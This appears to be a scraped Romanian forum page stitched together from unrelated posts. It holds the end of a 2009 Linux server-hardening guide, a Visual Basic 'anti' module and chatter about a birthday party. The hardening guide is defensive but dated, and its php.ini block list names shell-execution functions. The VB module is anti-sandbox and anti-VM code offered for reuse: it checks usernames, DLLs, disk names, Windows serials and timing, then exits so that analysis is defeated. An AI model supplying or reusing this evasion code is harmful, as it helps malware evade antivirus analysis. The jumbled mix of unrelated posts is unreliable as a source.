[~]# tar -zxvf ZendOptimizer-3.3.3-linux-glibc23-i386.tar.gz root@server [~]# cd ZendOptimizer-3.3.3-linux-glibc23-i386 root@server [~/ZendOptimizer-3.3.3-linux-glibc23-i386]# ./install.sh Welcome to Zend Optimizer installation..... - Press Enter button Zend licence agreement... - Press Enter button Do you accept the terms of this licence... - Yes, press Enter button Location of Zend Optimizer... - /usr/local/Zend, press Enter button Confirm the location of your php.ini file...- /usr/local/lib, press Enter button Are you using Apache web-server.. - Yes, press Enter button Specify the full path to the Apache control utility(apachectl)...-/usr/local/apache/bin/apachectl, press Enter button The installation has completed seccessfully...- Press Enter button Now restart apache, type this into SSH: root@server [~]# service httpd restart 3.5) php.ini & disabled functions Edit php.ini like this: root@server [~]# nano /usr/local/lib/php.ini ------------------------------------------------------------ safe_mode = On expose_php = Off Enable_dl= Off magic_quotes = On register_globals = off display errors = off disable_functions = system, show_source, symlink, exec, dl, shell_exec, passthru, phpinfo, escapeshellarg,escapeshellcmd ------------------------------------------------------------- root@server [~]# service httpd restart Or you can edit php.ini via WHM: WHM - Service Configuration - PHP Configuration Editor ========================================================= | 4) Kernel Hardening | Linux Kernel + Grsecurity Patch | ========================================================= Description : grsecurity is an innovative approach to security utilizing a multi-layered detection, prevention, and containment model. It is licensed under the GPL. It offers among many other features: -An intelligent and robust Role-Based Access Control (RBAC) system that can generate least privilege policies for your entire system with no configuration -Change root (chroot) hardening -/tmp race prevention -Extensive auditing -Prevention of arbitrary code execution, regardless of the technique used (stack smashing, heap corruption, etc) -Prevention of arbitrary code execution in the kernel -Randomization of the stack, library, and heap bases -Kernel stack base randomization -Protection against exploitable null-pointer dereference bugs in the kernel -Reduction of the risk of sensitive information being leaked by arbitrary-read kernel bugs -A restriction that allows a user to only view his/her processes -Security alerts and audits that contain the IP address of the person causing the alert Downloading and patching kernel with grsecurity root@server [~]# cd /root root@server [~]# wget http://www.kernel.org/pub/linux/kernel/v2.6/linux-2.6.26.5.tar.gz root@server [~]# wget http://www.grsecurity.com/test/grsecurity-2.1.12-2.6.26.5-200809141715.patch root@server [~]# tar xzvf linux-2.6.26.5.tar.gz root@server [~]# patch -p0 < grsecurity-2.1.12-2.6.26.5-200809141715.patch root@server [~]# mv linux-2.6.26.5 linux-2.6.26.5-grsec root@server [~]# ln -s linux-2.6.26.5-grsec/ linux root@server [~/linux]# cd linux root@server [~/linux]# cp /boot/config-`uname -r` .config root@server [~/linux]# make oldconfig Compile the Kernel: root@server [~/linux]# make bzImage root@server [~/linux]# make modules root@server [~/linux]# make modules_install root@server [~/linux]# make install Check your grub loader config, and make sure default is 0 root@server [~/linux]# nano /boot/grub/grub.conf Reboot the server root@server [~/linux]# reboot ========== | 5) SSH | ========== In order to change SSH port and protocol you will have to edit sshd_config root@server [~]# nano /etc/ssh/sshd_config Change Protocol 2,1 to Protocol 2 Change #Port 22 to some other port and uncomment it Like, Port 1337 There is a lot of script kiddiez with brute forcers and they will try to crack our ssh pass because they know username is root, port is 22 But we were smarter, we have changed SSH port Also, their "brute forcing" can increase server load, it means our sites(hosted on that server) will be slower SSH Legal Message edit /etc/motd, write in motd something like this: "ALERT! That is a secured area. Your IP is logged. Administrator has been notified" When someone login into SSH he will see that message: ALERT! That is a secured area. Your IP is logged. Administrator has been notified If you want to recieve an email every time when someone logins into SSH as root, edit .bash_profile(It's located in /root directory) and put this at the end of file: echo 'ALERT - Root Shell Access on:' `date` `who` | mail -s "Alert: Root Access from `who | awk '{print $6}'`" mail@something.com And at the end restart SSH, type "service sshd restart" into SSH ================================= | 6) Firewall | DDoS Protection | ================================= 6.1) Firewall, CSF Installation root@server [~]# wget http://www.configserver.com/free/csf.tgz root@server [~]# tar -xzf csf.tgz root@server [~]# cd csf In order to install csf your server needs to have some ipt modules enabled. csftest is a perl script and it comes with csf. You can check those mudules with it. root@server [~/csf]# ./csftest.pl The output should be like this: root@server [~/csf]# ./csftest.pl Testing ip_tables/iptable_filter...OK Testing ipt_LOG...OK Testing ipt_multiport/xt_multiport...OK Testing ipt_REJECT...OK Testing ipt_state/xt_state...OK Testing ipt_limit/xt_limit...OK Testing ipt_recent...OK Testing ipt_owner...OK Testing iptable_nat/ipt_REDIRECT...OK No worries if you have no all those mudules enabled, csf will work is you didn't get any FATAL errors at the end of the output. Now, get to installation root@server [~/csf]# ./install.sh You will have to edit conf.csf file. It's located here: /etc/csf/csf.conf You need to edit it like this: Testing = "0" And have to configure open ports in conf.csf or you won't be able to access these ports. In most cases it should be configured like this if you are using cP/WHM. If you are running something on some other port you will have to enable it here. If you changed SSH port you will have to enable a new port here: # Allow incoming TCP ports TCP_IN = "20,21,22,25,53,80,110,143,443,465,587,993,995,2077,2078,2082,2083,2086,2087,2095,2096" # Allow outgoing TCP ports TCP_OUT = "20,21,22,25,37,43,53,80,110,113,443,587,873,2087,2089,2703" 6.2) CSF Connection Limit There is in csf.conf CT option, configure it like this CT_LIMIT = "200" It means every IP with more than 200 connections is going to be blocked. CT_PERMANENT = "1" IP will blocked permanent CT_BLOCK_TIME = "1800" IP will be blocked 1800 secs(1800 secs = 30 mins) CT_INTERVAL = "60" Set this to the the number of seconds between connection tracking scans. After conf.csf editing you need to restart csf root@server [~# service csf restart 6.3) SYN Cookies Edit the /etc/sysctl.conf file and add the following line in order to enable SYN cookies protection: ----------------------------------- # Enable TCP SYN Cookie Protection net.ipv4.tcp_syncookies = 1 ----------------------------------- root@server [~/]# service network restart 6.4) CSF as security testing tool CSF has an option "Server Security Check". Go to WHM - Plugins - CSF - Test Server Security. You will see additional steps how to secure the server even more. I'm writing only about most important things here and I covered most of them in the paper but if you want you can follow steps provided by CSF to get the server even more secured. 6.5) Mod_Evasive ModEvasive module for apache offers protection against DDoS (denial of service attacks) on your server. To install it login into SSH and type --------------------------------------------------------------------------------- root@server [~]# cd /root/ root@server [~]# wget http://www.zdziarski.com/projects/mod_evasive/mod_evasive_1.10.1.tar.gz root@server [~]# tar zxf mode_evasive-1.10.1.tar.gz root@server [~]# cd mod_evasive then type... root@server [~/mod_evasive]# /usr/sbin/apxs -cia mod_evasive20.c --------------------------------------------------------------------------------- When mod_evasive is installed, place the following lines in your httpd.conf (/etc/httpd/conf/httpd.conf) -------------------------------- <IfModule mod_evasive20.c> DOSHashTableSize 3097 DOSPageCount 2 DOSSiteCount 50 DOSPageInterval 1 DOSSiteInterval 1 DOSBlockingPeriod 10 </IfModule> -------------------------------- 6.6) Random things: csf -d IP - Block an IP with CSF csf -dr IP - Unblock an IP with CSF csf -s - Start firewall rules csf -f - Flush/stop firewall rules csf -r - Restart firewall rules csf -x - Disable CSF csf -e - Enable CSF csf -c - Check for updates csf -h - Show help screen -Block an IP via iptables iptables -A INPUT -s 208.131.183.169 -j DROP -Unblock an IP via iptables iptables -I INPUT -s IP -j ACCEPT -See how many IP addresses are connected to the server and how many connections has each of them. netstat -ntu | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n =================== | 7) Mod_Security | =================== Mod_Security is a web application firewall and he can help us to secure our sites against RFI, LFI, XSS, SQL Injection etc If you use cP/WHM you can easly enable Mod_security in WHM - Plugins - Enable Mod_Security and save Now I will explain how to install Mod_security from source. You can't install Mod_Security if you don't have libxml2 and http-devel libraries. Also, you need to enable mod_unique_id in apache modules, but don't worry, I will explain how to do it Login into SSH and type... root@server [~]# yum install libxml2 libxml2-devel httpd-devel libxml2 libxml2-devel httpd-devel should be installed now then you need to edit httpd.conf file, you can find it here: root@server [~]# nano /etc/httpd/conf/httpd.conf You need to add this in your httpd.conf file LoadModule unique_id_module modules/mod_unique_id.so Now download the latest version of mod_security for apache2 from ModSecurity: Open Source Web Application Firewall login into SSH and type... root@server [~]# cd /root/ root@server [~]# wget SourceForge.net: ModSecurity: Downloading ... root@server [~]# tar zxf modsecurity-apache_2.5.6.tar.gz root@server [~]# cd modsecurity-apache_2.5.6 root@server [~/modsecurity-apache_2.5.6]# cd apache2 then type: root@server [~/modsecurity-apache_2.5.6/apache2]# ./configure root@server [~/modsecurity-apache_2.5.6/apache2]# make root@server [~/modsecurity-apache_2.5.6/apache2]# make install Go at the end of httpd.conf and place an include for our config/rules file... Include /etc/httpd/conf/modsecurity.conf --------------------------------------------------------- # /etc/httpd/conf/httpd.conf LoadModule unique_id_module modules/mod_unique_id.so LoadFile /usr/lib/libxml2.so LoadModule security2_module modules/mod_security2.so Include /etc/httpd/conf/modsecurity.conf --------------------------------------------------------- You need to find good rules for Mod_Security. You can find them at official Mod_Security site. Also, give a try to gotroot.com rules. When you find a good rules, just put them in /etc/httpd/conf/modsecurity.conf And restart httpd at the end, type "service httpd restart" into SSH ========================== | 8) Anti-Virus - ClamAV | ========================== You need AV protection to protect the server against worms and trojans invading your mailbox and files! Just install clamav (a free open source antivirus software for linux). More information can be found on clamav website - Clam AntiVirus In order to install CLamAV login into SSH and type root@server [~]# yum install clamav Once you have installed clamav for your CentOS, here are some basic commands you will need: Update the antivirus database root@server [~]# freshclam Run antivirus root@server [~]# clamscan -r /home Running as Cron Daily Job To run antivirus as a cron job (automatically scan daily) just run crontab -e from your command line. Then add the following line and save the file. @daily root clamscan -R /home It means clamav will be scanning /home directory every day. You can change the folder to whatever you want to scan. ============== | 9) Rootkit | ============== Rootkit scanner is scanning tool to ensure you for about 99.9%* you're clean of nasty tools. This tool scans for rootkits, backdoors and local exploits by running tests like: -MD5 hash compare -Look for default files used by rootkits -Wrong file permissions for binaries -Look for suspected strings in LKM and KLD modules -Look for hidden files -Optional scan within plaintext and binary files Instalation: Login into SSH and type root@server [~]# cd /root/ root@server [~]# wget http://downloads.rootkit.nl/rkhunter-1.2.7.tar.gz root@server [~]# tar -zxvf rkhunter-1.2.7.tar.gz root@server [~]# cd rkhunter-1.2.7 root@server [~rkhunter-1.2.7]# ./installer.sh Scan the server with rkhunter root@server [~]# rkhunter -c ========================= | 10) The Rest of Shits | ========================= 10.1) Random suggestions If you use bind DNS server then we need to edit named.conf file named.conf is located here: /etc/named.conf and add recursion no; under Options ---------------------------- Options{ recursion no; ---------------------------- Now restart bind, type into SSH root@server [~]# service named restart This will prevent lookups from dnstools.com and similar services and reduce server load In order to prevent IP spoofing, you need to edit host.conf file like this: This file is located here: /etc/host.conf Add that in host.conf ------------------ order bind,hosts nospoof on ------------------ Hide the Apache version number: edit httpd.conf (/etc/httpd/conf/httpd.conf) ----------------------- ServerSignature Off ----------------------- Disable telnet: Edit file: /etc/xinetd.d/telnet ------------------ disable = yes ------------------ 10.2) Passwords Don't use the same password you are using for the server on some other places. When the Datacenter contacts you via e-mail or phone, always request more informations. Remember, someone alse could contact you to get some information or even root passwords. 10.3) Random thoughts No matter what you need to secure the server, don't think you are safe only because you are not personally involved in any shits with "hackers". When you are hosting hacking/warez related sites you are the target. There is no such thing as totally secured server. Most important things are backups, make sure you will always have an "up-to-date" offsite backups ^^ Anyhow, this is the end of my paper, I hope it will help you to get some kind of security to your server. -Krun!x # milw0rm.com [2009-06-29]

Nu m-am mai ocupat de mult cu asa ceva. Credeam ca e "high" level, daca s-a cerut raspunsul.

Pffff ... JS de 2 lei.

Ho ba ca va tai!

This module will detect most of the sandboxes and virtual machines out there. It's the biggest ANTI-module out there. '--------------------------------------------------------------------------------------- ' Module : mAnti ' DateTime : 29/06/2009 15:59 ' Author : SqUeEzEr ' Mail : scott_van_dinter@hotmail.com ' Purpose : Detect most of the AV's ' by: Usernames ' Computernames ' Loaded Dll's ' HardDrive Names ' Windows Serials ' Emulators ' ' Usage : At your own risk ' Requirements: None ' Distribution: You can freely use this code in your own ' applications, but you may not reproduce ' or publish this code on any web site, ' online service, or distribute as source ' on any media without express permission. ' ' History : 29/06/2009 Created...................................................... '--------------------------------------------------------------------------------------- Option Explicit Private Declare Function GetModuleHandleA Lib "kernel32" (ByVal lpModuleName As String) As Long Private Declare Function GetTickCount Lib "kernel32" () As Long Private Declare Function RegOpenKeyExA Lib "advapi32.dll" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal ulOptions As Long, ByVal samDesired As Long, phkResult As Long) As Long Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long Private Declare Function RegQueryValueExA Lib "advapi32.dll" (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, lpData As Any, lpcbData As Long) As Long Private Declare Sub Sleep Lib "kernel32" (ByVal lngMilliseconds As Long) Private Declare Sub ExitProcess Lib "kernel32" (ByVal uExitCode As Long) Public Sub sAnti() Dim aUsers(6) As String Dim aComputers(3) As String Dim aDlls(1) As String Dim aHDDs(3) As String Dim aSerials(1) As String Dim sUser As String * 255 Dim sComputer As String * 255 Dim sWinSerial As String Dim bFound As Boolean Dim lBefore As Long Dim lAfter As Long Dim lhKey As Long Dim sBuffer As String Dim lLen As Long Dim i As Long Dim oSet As Object Dim oObj As Object 'initialize strings and arrays aUsers(0) = "Sndbx" aUsers(1) = "tester" aUsers(2) = "panda" aUsers(3) = "currentuser" aUsers(4) = "Schmidti" aUsers(5) = "andy" aUsers(6) = "Andy" aComputers(0) = "AUTO" aComputers(1) = "VMLOG" aComputers(2) = "NONE-DUSEZ" aComputers(3) = "XPSP3" aDlls(0) = "SbieDll.dll" aDlls(1) = "dbghelp.dll" aHDDs(0) = "*VIRTUAL*" aHDDs(1) = "*VMWARE*" aHDDs(2) = "*VBOX*" aHDDs(3) = "*QEMU*" aSerials(0) = "55274-339-6006333-22900" aSerials(1) = "76487-OEM-0065901-82986" sUser = Environ("username") sComputer = Environ("computername") 'Username Detections For i = 0 To UBound(aUsers) If Left(sUser, Len(aUsers(i))) = aUsers(i) Then bFound = True Next i 'Computername Detections For i = 0 To UBound(aComputers) If Left(sComputer, Len(aComputers(i))) = aComputers(i) Then bFound = True Next i 'Dll Detections For i = 0 To UBound(aDlls) If GetModuleHandleA(aDlls(i)) Then bFound = True Next i 'Emulator Detections, Method by ChainCoder lBefore = GetTickCount Sleep 510 lAfter = GetTickCount If (lAfter - lBefore) < 500 Then bFound = True 'HardDrive Detections, Method by Cobein If RegOpenKeyExA(&H80000002, "SYSTEM\ControlSet001\Services\Disk\Enum", 0, &H20019, lhKey) = 0 Then sBuffer = Space$(255): lLen = 255 If RegQueryValueExA(lhKey, "0", 0, 1, ByVal sBuffer, lLen) = 0 Then sBuffer = UCase(Left$(sBuffer, lLen - 1)) For i = 0 To UBound(aHDDs) If sBuffer Like aHDDs(i) Then bFound = True Next i End If Call RegCloseKey(lhKey) End If 'Windows Serial Detections On Error Resume Next Set oSet = GetObject("winmgmts:{impersonationLevel=impersonate}").InstancesOf(Split("Win32_OperatingSystem,SerialNumber", ",")(0)) sWinSerial = "" For Each oObj In oSet sWinSerial = oObj.Properties_(Split("Win32_OperatingSystem,SerialNumber", ",")(1)) 'Property value sWinSerial = Trim(sWinSerial) Next For i = 0 To UBound(aSerials) If sWinSerial = aSerials(i) Then bFound = True Next i 'Final check If bFound = True Then ExitProcess (0) End Sub Credits for the anti emulator idea: ChainCoder Credits for the Drive Model Name: Cobein

Vreau sa scriu un articol pentru incepatori in care sa explic cum sta treaba, si sa fie "obligati" sa il citeasca noii veniti. Bine, eu zic ca fac multe dar nu fac niciodata nimic.

A fost super misto. Femei, manele, bautura... Ce altceva mai trebuia?

Ms. Nu mai sarbatoresc... Baui 2 kile de suc si ma doare burta Dar am de toate... Mai am si beutura ( am luat 30 de beri si dupa ce venim de la gratar, se duce tata pe balcon si zice: "Pai bine ma, am luat 30 de beri si acum avem 41" ). Am si vin si lichior si coniac si sampanie. Taria s-a baut. Sunt fericit ca nu m-am imbatat. Cred ca daca ma imbatam ma ducem la pescuit ca incepuse unu dupa ce se imbatase: "Hai ba la peste, sti ce bine merge pestele noaptea?"

Ms baieti. A, da. NU m-am imbatat la propriul majorat, doar m-am ametit.

Of ce ma iubiti voi pe mine <'> De dimineata ploua si nu credeam ca merem la gratar, sper sa se faca frumos sa mergem.

Mersi baieti. Azi nu am baut decat o bere, pe care mi-am cumparat-o singur. Maine sa vad ce fac

Uuuu 10 urari peste noapte, ce ma iubeste lumea Si eu va iubesc pe voi <'> chiar daca mai dau ba un warn, ba un ban... Ei, ce sa faci, asta e meseria mea Azi si maine puteti face ce vreti, injura cat vreti, offtopic pana va pica degetele. De baut ma pastrez pentru maine. Teoretic nu vreau sa ma imbat ( rau ), imi tot zic ca nu ma imbat, nu ma imbat... Dar nu prea cred ca rezist eu pe sec... Mersi baieti